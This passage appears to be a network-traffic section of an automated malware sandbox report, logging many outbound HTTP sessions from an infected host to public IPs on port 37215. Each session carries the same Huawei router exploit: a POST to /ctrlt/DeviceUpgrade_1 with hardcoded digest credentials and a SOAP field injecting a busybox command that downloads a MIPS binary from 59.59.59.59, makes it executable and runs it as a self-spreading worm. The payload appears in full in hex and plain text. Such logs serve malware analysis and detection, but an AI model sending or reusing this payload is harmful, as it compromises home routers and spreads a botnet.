                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1963192.168.2.1535034157.24.101.15137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.041913033 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1964192.168.2.1533876157.226.153.22837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.042586088 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1965192.168.2.1543436197.159.80.3137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.042632103 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1966192.168.2.1548182144.150.11.2237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.042951107 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1967192.168.2.1542760157.208.55.16837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.043009043 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1968192.168.2.1532814197.175.184.9937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.046135902 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1969192.168.2.1539322157.149.153.19937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.046163082 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1970192.168.2.1540822197.220.212.16737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.046833992 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1971192.168.2.1551802197.49.178.8837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.046850920 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1972192.168.2.153391441.17.169.17037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.047873974 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
